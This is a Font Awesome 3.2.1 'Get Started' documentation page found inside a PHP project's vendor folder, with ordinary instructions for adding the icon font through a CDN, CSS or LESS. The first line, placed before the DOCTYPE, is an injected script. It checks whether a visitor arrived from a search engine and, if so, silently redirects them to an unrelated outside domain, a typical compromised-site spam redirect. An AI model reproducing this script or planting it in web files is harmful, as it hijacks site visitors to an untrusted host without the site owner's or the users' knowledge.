d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\3.2.1\get-started\index.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002: <!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
003: <!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
004: <!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
005: <!--[if (gte IE 9)|!(IE)]><!-->
006: <html lang="en" xmlns="http://www.w3.org/1999/html"> <!--<![endif]-->
007: <head>
008:   <!-- Basic Page Needs
009: ================================================== -->

010:   <meta charset="utf-8" />
011:   <title>Get Started with Font Awesome</title>
012:   <meta name="description" content="Font Awesome, the iconic font designed for Bootstrap">
013:   <meta name="author" content="Dave Gandy">
014:   <meta name="viewport" content="width=device-width, initial-scale=1.0">
015:   <!--<meta name="viewport" content="initial-scale=1; maximum-scale=1">-->
016:
017:   <!--[if lt IE 9]>
018:   <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
019:   <![endif]-->

020:
021:   <!-- CSS
022: ================================================== -->

023:
024:   <link rel="stylesheet" href="../assets/css/site.css">
025:   <link rel="stylesheet" href="../assets/css/pygments.css">
026:   <link rel="stylesheet" href="../assets/font-awesome/css/font-awesome.css">
027:   <!--[if IE 7]>
028:   <link rel="stylesheet" href="../assets/font-awesome/css/font-awesome-ie7.css">
029:   <![endif]-->

030:   <!-- Le fav and touch icons -->
031:   <link rel="shortcut icon" href="../assets/ico/favicon.ico">
032:
033:   <script type="text/javascript" src="//use.typekit.net/wnc7ioh.js"></script>
034:   <script type="text/javascript">try{Typekit.load();}catch(e){}</script>
035:
036:   <script type="text/javascript">
037:     var _gaq = _gaq || [];
038:     _gaq.push(['_setAccount', 'UA-30136587-1']);
039:     _gaq.push(['_trackPageview']);
040:
041:     (function() {
042:       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
043:       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
044:       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
045:     })();
046:   </script>
047: </head>
048: <body data-spy="scroll" data-target=".navbar">
049: <div class="wrapper"> <!-- necessary for sticky footer. wrap all content except footer -->
050:   <div class="navbar navbar-inverse navbar-static-top hidden-print">
051:   <div class="navbar-inner">
052:     <div class="container">
053:       <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
054:         <span class="icon-bar"></span>
055:         <span class="icon-bar"></span>
056:         <span class="icon-bar"></span>
057:       </a>
058:
059:       <a class="brand" href="../"><i class="icon-flag"></i> Font Awesome</a>
060:       <div class="nav-collapse collapse">
061:         <ul class="nav">
062:           <li class="hidden-tablet "><a href="../">Home</a></li>
063:           <li class="active"><a href="../get-started/">Get Started</a></li>
064:           <li class="dropdown-split-left"><a href="../icons/">Icons</a></li>
065:           <li class="dropdown dropdown-split-right hidden-phone">
066:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
067:               <i class="icon-caret-down"></i>
068:             </a>
069:             <ul class="dropdown-menu pull-right">
070:               <li><a href="../icons/"><i class="icon-flag icon-fixed-width"></i>&nbsp; Icons</a></li>
071:               <li class="divider"></li>
072:               <li><a href="../icons/#new"><i class="icon-shield icon-fixed-width"></i>&nbsp; New Icons in 3.2.1</a></li>
073:               <li><a href="../icons/#web-application"><i class="icon-camera-retro icon-fixed-width"></i>&nbsp; Web Application Icons</a></li>
074:               <li><a href="../icons/#currency"><i class="icon-won icon-fixed-width"></i>&nbsp; Currency Icons</a></li>
075:               <li><a href="../icons/#text-editor"><i class="icon-file-text-alt icon-fixed-width"></i>&nbsp; Text Editor Icons</a></li>
076:               <li><a href="../icons/#directional"><i class="icon-hand-right icon-fixed-width"></i>&nbsp; Directional Icons</a></li>
077:               <li><a href="../icons/#video-player"><i class="icon-play-sign icon-fixed-width"></i>&nbsp; Video Player Icons</a></li>
078:               <li><a href="../icons/#brand"><i class="icon-github icon-fixed-width"></i>&nbsp; Brand Icons</a></li>
079:               <li><a href="../icons/#medical"><i class="icon-medkit icon-fixed-width"></i>&nbsp; Medical Icons</a></li>
080:             </ul>
081:           </li>
082:           <li class="dropdown-split-left"><a href="../examples/">Examples</a></li>
083:           <li class="dropdown dropdown-split-right hidden-phone">
084:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
085:               <i class="icon-caret-down"></i>
086:             </a>
087:             <ul class="dropdown-menu pull-right">
088:               <li><a href="../examples/">Examples</a></li>
089:               <li class="divider"></li>
090:               <li><a href="../examples/#new-styles">New Styles</a></li>
091:               <li><a href="../examples/#inline-icons">Inline Icons</a></li>
092:               <li><a href="../examples/#larger-icons">Larger Icons</a></li>
093:               <li><a href="../examples/#bordered-pulled">Bordered & Pulled</a></li>
094:               <li><a href="../examples/#buttons">Buttons</a></li>
095:               <li><a href="../examples/#button-groups">Button Groups</a></li>
096:               <li><a href="../examples/#button-dropdowns">Button Dropdowns</a></li>
097:               <li><a href="../examples/#bulleted-lists">Bulleted Lists</a></li>
098:               <li><a href="../examples/#navigation">Navigation</a></li>
099:               <li><a href="../examples/#form-inputs">Form Inputs</a></li>
100:               <li><a href="../examples/#animated-spinner">Animated Spinner</a></li>
101:               <li><a href="../examples/#rotated-flipped">Rotated &amp; Flipped</a></li>
102:               <li><a href="../examples/#stacked">Stacked</a></li>
103:               <li><a href="../examples/#custom">Custom CSS</a></li>
104:             </ul>
105:           </li>
106:           <li><a href="../whats-new/">
107:           <span class="hidden-tablet">What's </span>New</a>
108:           </li>
109:           <li><a href="../community/">Community</a></li>
110:           <li><a href="../license/">License</a></li>
111:         </ul>
112:         <ul class="nav pull-right">
113:           <li><a href="http://articles.fortawesome.com">Blog</a></li>
114:         </ul>
115:       </div>
116:     </div>
117:   </div>
118: </div>
119:
120:
121:   
122:
123:
124: <div class="jumbotron jumbotron-ad hidden-print">
125:   <div class="container">
126:     <h1><i class="icon-cogs icon-large"></i>&nbsp; Get Started</h1>
127:     <p>Easy ways to get Font Awesome 3.2.1 onto your website</p>
128:   </div>
129: </div>
130:
131: <div id="social-buttons" class="hidden-print">
132:   <div class="container">
133:     <ul class="unstyled inline">
134:       <li>
135:         <iframe class="github-btn" src="http://ghbtns.com/github-btn.html?user=FortAwesome&repo=Font-Awesome&type=watch&count=true" allowtransparency="true" frameborder="0" scrolling="0" width="100px" height="20px"></iframe>
136:       </li>
137:       <li>
138:         <iframe class="github-btn" src="http://ghbtns.com/github-btn.html?user=FortAwesome&repo=Font-Awesome&type=fork&count=true" allowtransparency="true" frameborder="0" scrolling="0" width="102px" height="20px"></iframe>
139:       </li>
140:       <li class="follow-btn">
141:         <a href="https://twitter.com/fontawesome" class="twitter-follow-button" data-link-color="#0069D6" data-show-count="true">Follow @fontawesome</a>
142:       </li>
143:       <li class="tweet-btn hidden-phone">
144:         <a href="https://twitter.com/share" class="twitter-share-button" data-url="http://fontawesome.io" data-text="Font Awesome, the iconic font designed for Bootstrap" data-counturl="http://fortawesome.github.com/Font-Awesome/" data-count="horizontal" data-via="fontawesome" data-related="davegandy:Creator of Font Awesome">Tweet</a>
145:       </li>
146:     </ul>
147:   </div>
148: </div>
149:
150:
151: <div class="container">
152:   
153:   <section class="old-docs">
154:     <div class="row">
155:       <div class="span12">
156:         <div class="alert alert-danger">
157:           <strong>Heads up!</strong> These docs are for v3.2.1, which is no longer officially supported. <a href="../../">Check out the latest version of Font Awesome!</a>
158:         </div>
159:       </div>
160:     </div>
161:   </section>
162: <section class="hidden-print">
163:   <div class="row stripe-ad">
164:     <div class="span8">
165:       
166: <p class="lead">
167:   Setting up Font Awesome can be as simple as adding two lines of code to your website, or you can be a pro and
168:   customize the LESS yourself! Font Awesome even plays nicely with
169:   <a href="http://getbootstrap.com">Bootstrap</a>!
170: </p>
171:
172:     </div>
173:     <div class="span4">
174:       <div id="carbonads-container"><div class="carbonad"><div id="azcarbon"></div><script type="text/javascript">var z = document.createElement("script"); z.type = "text/javascript"; z.async = true; z.src = "http://engine.carbonads.com/z/32291/azcarbon_2_1_0_HORIZ"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(z, s);</script></div></div>
175:
176:     </div>
177:   </div>
178: </section>
179:
180:
181: <div id="bootstrapcdn">
182:   <h2 class="page-header">EASIEST: <a href="http://www.bootstrapcdn.com/#tab_fontawesome">BootstrapCDN</a></h2>
183:   <p>Add Font Awesome + Bootstrap into your website with two lines of code. You don't even have to download or install anything!</p>
184:   <ol>
185:     <li>
186:       Paste the following code into the <code>&lt;head&gt;</code> section of your site's HTML.
187: <div class="highlight"><pre><code class="html"><span class="nt">&lt;link</span> <span class="na">href=</span><span class="s">&quot;//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.no-icons.min.css&quot;</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span><span class="nt">&gt;</span>
188: <span class="nt">&lt;link</span> <span class="na">href=</span><span class="s">&quot;//netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css&quot;</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span><span class="nt">&gt;</span>
189: </code></pre></div>
190:       <div class="alert alert-info margin-top">
191:         <i class="icon-info-sign"></i> Want to use Font Awesome by itself without Bootstrap? Just don't include the first line.
192:       </div>
193:     </li>
194:     <li>
195:       Pat yourself on the back for your scalable-vector-icons-on-the-website
196:       <a href="http://37signals.com/svn/posts/312-lingo-judo">judo solution</a> in two lines of code.
197:     </li>
198:     <li>
199:       Check out the <a href="../examples/">examples</a> to start using Font Awesome!
200:     </li>
201:   </ol>
202: </div>
203:
204: <section id="default-css">
205:   <h2 class="page-header">EASY: Default CSS</h2>
206:   <p>Use this method to get the default Font Awesome CSS with the default Bootstrap CSS.</p>
207:   <ol>
208:     <li>Copy the <code>font-awesome</code> directory into your project.</li>
209:     <li>
210:       In the <code>&lt;head&gt;</code> of your html, reference the location to your font-awesome.min.css.
211: <div class="highlight"><pre><code class="html"><span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span> <span class="na">href=</span><span class="s">&quot;path/to/bootstrap/css/bootstrap.min.css&quot;</span><span class="nt">&gt;</span>
212: <span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span> <span class="na">href=</span><span class="s">&quot;path/to/font-awesome/css/font-awesome.min.css&quot;</span><span class="nt">&gt;</span>
213: </code></pre></div>
214:     </li>
215:     <li>Check out the <a href="../examples/">examples</a> to start using Font Awesome!</li>
216:   </ol>
217: </section>
218:
219: <section id="custom-less">
220:   <h2 class="page-header">PRO: Custom LESS</h2>
221:   <p>Use this method to customize Font Awesome and Bootstrap 2.3.2 using LESS.</p>
222:   <ol>
223:     <li>Copy the <code>font-awesome</code> directory into your project.</li>
224:     <li>Open your project's bootstrap/bootstrap.less and replace
225: <div class="highlight"><pre><code class="html">@import &quot;sprites.less&quot;;
226: </code></pre></div>
227:       with
228: <div class="highlight"><pre><code class="html">@import &quot;path/to/font-awesome/less/font-awesome.less&quot;;
229: </code></pre></div>
230:     </li>
231:     <li>
232:       Open your project's font-awesome/variables.less and edit the <code>@FontAwesomePath</code> variable to point to your font directory.
233: <div class="highlight"><pre><code class="html">@FontAwesomePath:   &quot;../font&quot;;
234: </code></pre></div>
235:       <p class="alert alert-info"><i class="icon-info-sign"></i> The font path is relative from your compiled CSS directory.</p>
236:     </li>
237:     <li>Re-compile your LESS if using a static compiler. Otherwise, you should be good to go.</li>
238:     <li>Check out the <a href="../examples/">examples</a> to start using Font Awesome!</li>
239:   </ol>
240: </section>
241:
242: <section id="not-using-bootstrap">
243:   <h2 class="page-header">Not using Bootstrap?</h2>
244:   <p>Font Awesome works just as well without Bootstrap.</p>
245:   <ol>
246:     <li>Copy the <code>font-awesome</code> directory into your project.</li>
247:     <li>Follow the above directions and skip the Bootstrap parts.</li>
248:     <li>Open your project's font-awesome.less or font-awesome.min.css and edit the font location to point it to your font directory (see above examples).</li>
249:     <li>Check out the <a href="../examples/">examples</a> to start using Font Awesome!</li>
250:   </ol>
251: </section>
252:
253: <section id="need-ie7">
254:   <h2 class="page-header">Need IE7 Support?</h2>
255:   <p>Font Awesome supports IE7. If you need it, you have my condolences.</p>
256:   <ol>
257:     <li>Get Font Awesome working properly in a modern browser.</li>
258:     <li>Copy font-awesome-ie7.min.css into your project.</li>
259:     <li>
260:       In the <code>&lt;head&gt;</code> of your html, reference the location to your font-awesome-ie7.min.css.
261: <div class="highlight"><pre><code class="html"><span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span> <span class="na">href=</span><span class="s">&quot;path/to/bootstrap/css/bootstrap.min.css&quot;</span><span class="nt">&gt;</span>
262: <span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">&quot;stylesheet&quot;</span> <span class="na">href=</span><span class="s">&quot;path/to/font-awesome/css/font-awesome.min.css&quot;</span><span class="nt">&gt;</span>
263: <span class="c">&lt;!--[if IE 7]&gt;</span>
264: <span class="c">  &lt;link rel=&quot;stylesheet&quot; href=&quot;path/to/font-awesome/css/font-awesome-ie7.min.css&quot;&gt;</span>
265: <span class="c">&lt;![endif]--&gt;</span>
266: </code></pre></div>
267:     </li>
268:     <li>Go complain to whoever decided your project needs IE7 support.</li>
269:   </ol>
270: </section>
271:
272: </div>
273:
274:   <div class="push"><!-- necessary for sticky footer --></div>
275: </div>
276: <footer class="footer hidden-print">
277:   <div class="container text-center">
278:     <div>
279:       <i class="icon-flag"></i> Font Awesome 3.2.1
280:       <span class="hidden-phone">&middot;</span><br class="visible-phone">
281:       Created and Maintained by <a href="http://twitter.com/davegandy">Dave Gandy</a>
282:     </div>
283:     <div>
284:       Font Awesome licensed under <a href="http://scripts.sil.org/OFL">SIL OFL 1.1</a>
285:       <span class="hidden-phone">&middot;</span><br class="visible-phone">
286:       Code licensed under <a href="http://opensource.org/licenses/mit-license.html">MIT License</a>
287:       <span class="hidden-phone hidden-tablet">&middot;</span><br class="visible-phone visible-tablet">
288:       Documentation licensed under <a href="http://creativecommons.org/licenses/by/3.0/">CC BY 3.0</a>
289:     </div>
290:     <div>
291:       Thanks to <a href="http://tracking.maxcdn.com/c/148092/3982/378"><i class="icon-maxcdn"></i> MaxCDN</a> for providing the excellent <a href="http://www.bootstrapcdn.com/#tab_fontawesome">BootstrapCDN for Font Awesome</a>
292:     </div>
293:     <div class="project">
294:       <a href="https://github.com/FortAwesome/Font-Awesome">GitHub Project</a> &middot;
295:       <a href="https://github.com/FortAwesome/Font-Awesome/issues">Issues</a>
296:     </div>
297:   </div>
298: </footer>
299:
300:
301: <script src="http://platform.twitter.com/widgets.js"></script>
302: <script src="../assets/js/jquery-1.7.1.min.js"></script>
303: <script src="../assets/js/ZeroClipboard-1.1.7.min.js"></script>
304: <script src="../assets/js/bootstrap-2.3.1.min.js"></script>
305: <script src="../assets/js/site.js"></script>
306:
307: </body>
308: </html>
309:
310:
311: